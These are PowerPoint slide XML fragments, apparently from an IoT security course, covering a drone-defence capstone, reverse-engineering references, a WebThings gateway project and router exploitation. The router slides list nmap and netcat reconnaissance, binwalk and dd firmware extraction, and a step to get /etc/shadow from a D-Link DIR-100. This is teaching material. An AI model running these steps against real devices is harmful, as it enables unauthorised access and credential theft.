            <a:off x="6889597" y="2730450"/>
            <a:ext cx="1214150" cy="43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036EF9-5686-0747-9A90-8D7EAC7E42FA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="6162966" y="3689798"/>
            <a:ext cx="2103579" cy="21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3B3F85-9D2C-1840-AEBF-836E2D2B64D0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="6173357" y="3809428"/>
            <a:ext cx="2291770" cy="40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09F6AE-8D10-984E-903C-3AD7CA4CA3C3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="6173357" y="3888720"/>
            <a:ext cx="2291770" cy="87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ABFCF9-A604-2C45-919B-4E185EF45CEA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="6173357" y="3970533"/>
            <a:ext cx="2291770" cy="1331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7C9219C-7E95-DC4F-90D0-3BFBF501D312}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3343564" y="3373012"/>
            <a:ext cx="1565564" cy="162098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2595528-A8BF-2948-939C-A7F969FB3324}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7535708" y="1714509"/>
            <a:ext cx="17363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Processor SoC</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="32" name="Straight Arrow Connector 31">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{72F14E4E-31E3-4147-B715-76D875DF8046}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="4656293" y="1954700"/>
            <a:ext cx="2920233" cy="152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910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27" y="0"/>
            <a:ext cx="11745649" cy="868362"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Capstone 2: Protect against drone attacks</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="345095" y="2483994"/>
            <a:ext cx="11582400" cy="3736697"/>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Gatwick airport scenario.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>A few drones, not autonomously piloted (swarms are hard).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Balance effectiveness and impact on environment (shrapnel is bad at an airport) so is complete signal or GPS loss.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B4A7EF4C-4FE3-CA44-907E-E24BD3B1DAAF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{DD7197BE-A01B-AB4B-8C3B-F764F7D52191}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>160</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="13856187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01649"/>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Reverse engineering: summary</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="619432" y="2061275"/>
            <a:ext cx="11112910" cy="4295076"/>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Scared yet?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Do no harm!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Make things more secure.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{023477FF-CBE7-A340-BC07-027185C1AB01}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{DD7197BE-A01B-AB4B-8C3B-F764F7D52191}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>161</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3282408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36525"/>
            <a:ext cx="11694203"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p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="333476" y="1692910"/>
            <a:ext cx="11582400" cy="4663440"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Gal Beniamini, Project Zero, Over The Air: Exploiting Broadcom’s Wi-Fi Stack </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>http://www.freenove.com</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>https://github.com/ReFirmLabs/binwalk</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>https://www.arduino.cc/en/Tutorial/EEPROMRead</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>http://openocd.org/</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Dennis Giese, Having fun with IoT: Reverse Engineering and Hacking of Xiaomi IoT Devices DEFCON 26</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Dennis Giese, How-to modify ARM Cortex-M based firmware: A step-by-step approach for Xiaomi IoT Devices  DEFCON 26 IoT Village</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>SANS, Exploiting embedded devices</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Reverse engineering tool, Ghidra, is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lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Many on-line resources by people who have studied individual devices</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2F1D911D-E9E3-3543-8CD3-B4E1E3E07BE8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{DD7197BE-A01B-AB4B-8C3B-F764F7D52191}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>162</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="42178517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291" y="57013"/>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Build an IoT Gateway</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Mozilla WebThings is an open platform for monitoring and controlling devices over the web. It is an open source implementation of emerging </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>Web of Things</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> standards at the W3C. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>See: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>https://iot.mozilla.org/</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B060402020202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Monitor and control all your smart home devices via a unified web interface. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>WebThings Gateway</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> is a software distribution for smart home gateways which allows users to directly monitor and control their smart home over the web, without a middleman. You need:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1200150" lvl="2" indent="-285750"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A Raspberry Pi single board computer and power supply and microSD card (&gt;8GB, class 10), USB dongles (see the list of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>compatible adapters</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>, as an example, for Zigbee)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l" fontAlgn="base">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BE6B468-2579-F948-B473-743F31994152}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{DD7197BE-A01B-AB4B-8C3B-F764F7D52191}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>163</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="25170526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826" y="143479"/>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2206" y="1834597"/>
            <a:ext cx="11582400" cy="4663440"/>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a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">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4" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DFF1BA25-3BB0-134D-9312-8EC50196AC1B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{DD7197BE-A01B-AB4B-8C3B-F764F7D52191}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>164</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="27654617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11428" cy="868362"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="4000" b="1" dirty="0"/>
              <a:t>Router Exploitation</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Most routers use embedded Linux OS with Busybox which includes ftp and telnet.</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They use squashfs and can’t modify firmware while device is running.  In fact, you typically download updates manually on your PC and load them into the IoT device using a script based service.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Example Dlink DIR-100</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connected to router run route –n</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Nmap –sS –A –p –oN routertcp.nmap 192.168.0.1</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Performs TCP SYN.  Scan written toroutertcp.nmap</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5457/tcp open unknown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3478 udp open stun (simple traversal of UDP through NATs)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Netcat 192.168.0.1 5457</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Routerpwn.com</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"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1BD0E7FD-2387-8549-89EF-851DA3C2A8FA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{DD7197BE-A01B-AB4B-8C3B-F764F7D52191}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>165</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="26462243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1" y="113983"/>
            <a:ext cx="10923450" cy="868362"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="4000" b="1" dirty="0"/>
              <a:t>Router Exploitation</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Configuration files on /mnt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.cgi</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Use binwalk on web downloaded firmware</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Files extracted using dd based on info from binwalk</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dd if=DIR-100A1_FW113EUB01.bix of=filesys.squash skip=646016 bs=1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Firmware mod kit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Look at startup scripts in /etc.  E.g /etc/rc</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Find vulns of webserver</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900" algn="l">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Strings bin/webs | less</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900" algn="l">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>/bin/dyndns –host %s –server %s –user %s –pass %s –ip %d.%d.%d.%d –ForceUpdate %d&amp;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900" algn="l">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Tcpdump –i eth0 icmp</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900" algn="l">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Get /etc/shadow</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A4D77E09-CE64-0046-B070-5FE5B450C2CE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{DD7197BE-A01B-AB4B-8C3B-F764F7D52191}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>166</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4094217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1" y="113983"/>
            <a:ext cx="11387908" cy="868362"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="4000" b="1" dirty="0"/>
